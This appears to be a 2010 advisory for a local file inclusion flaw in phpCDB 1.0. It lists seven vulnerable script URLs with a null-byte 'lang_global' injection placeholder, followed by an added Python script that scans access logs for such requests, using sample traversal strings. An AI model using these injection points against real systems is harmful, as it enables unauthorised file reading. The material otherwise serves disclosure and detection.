# Title : phpCDB <= 1.0 Local File Include Vulnerability
# Published : 2010-02-27
# Author : cr4wl3r


##############################################################
##phpCDB <= 1.0 Local File Include Vulnerability
##############################################################
Author: cr4wl3r <cr4wl3rx40linuxmailx2Eorg>
Download: http://sourceforge.net/projects/phpcdb/files/
##############################################################
PoC:
 [phpcdb_path]/firstvisit.php?lang_global=[LFI%00]
 [phpcdb_path]/newfolder.php?lang_global=[LFI%00]
 [phpcdb_path]/showfolders.php?lang_global=[LFI%00]
 [phpcdb_path]/newlang.php?lang_global=[LFI%00]
 [phpcdb_path]/showinnerfolder.php?lang_global=[LFI%00]
 [phpcdb_path]/writecode.php?lang_global=[LFI%00]
 [phpcdb_path]/showcode.php?lang_global=[LFI%00]
##############################################################
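
Detection note (added example, not part of the original advisory and not phpCDB code): the script below scans web server access logs for requests to the seven scripts listed in the PoC whose lang_global value is anything other than a bare language name. The combined log format, the /phpcdb/ install path, the sample lines and the rule that legitimate values are simple names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Scripts named in the advisory's PoC list.
AFFECTED = {"firstvisit.php", "newfolder.php", "showfolders.php", "newlang.php",
            "showinnerfolder.php", "writecode.php", "showcode.php"}
# Assumption: a legitimate lang_global value is a bare language name.
SAFE_VALUE = re.compile(r"[A-Za-z0-9_-]{1,32}")
# Request line inside a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_lang_global(log_line):
    """Return the decoded lang_global value if the request should be flagged, else None."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if url.path.rsplit("/", 1)[-1].lower() not in AFFECTED:
        return None
    # parse_qsl percent-decodes, so an encoded null byte or slash shows up decoded.
    for key, value in parse_qsl(url.query):
        if key == "lang_global" and not SAFE_VALUE.fullmatch(value):
            return value
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every flagged log line."""
    hits = []
    for n, line in enumerate(lines, 1):
        value = suspicious_lang_global(line)
        if value is not None:
            hits.append((n, value))
    return hits

# Constructed sample log lines (addresses from the documentation range 192.0.2.0/24).
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Feb/2010:10:00:01 +0000] "GET /phpcdb/showcode.php?lang_global=english HTTP/1.1" 200 5120',
    '192.0.2.44 - - [27/Feb/2010:10:00:07 +0000] "GET /phpcdb/newlang.php?lang_global=..%2F..%2Fplaceholder%00 HTTP/1.1" 200 311',
    '192.0.2.44 - - [27/Feb/2010:10:00:09 +0000] "GET /phpcdb/other.php?lang_global=..%2Fplaceholder%00 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for n, value in scan(SAMPLE_LOG):
        print(f"line {n}: lang_global={value!r}")
```

Parameters sent in a POST body do not appear in access logs, so this check only covers values passed in the query string.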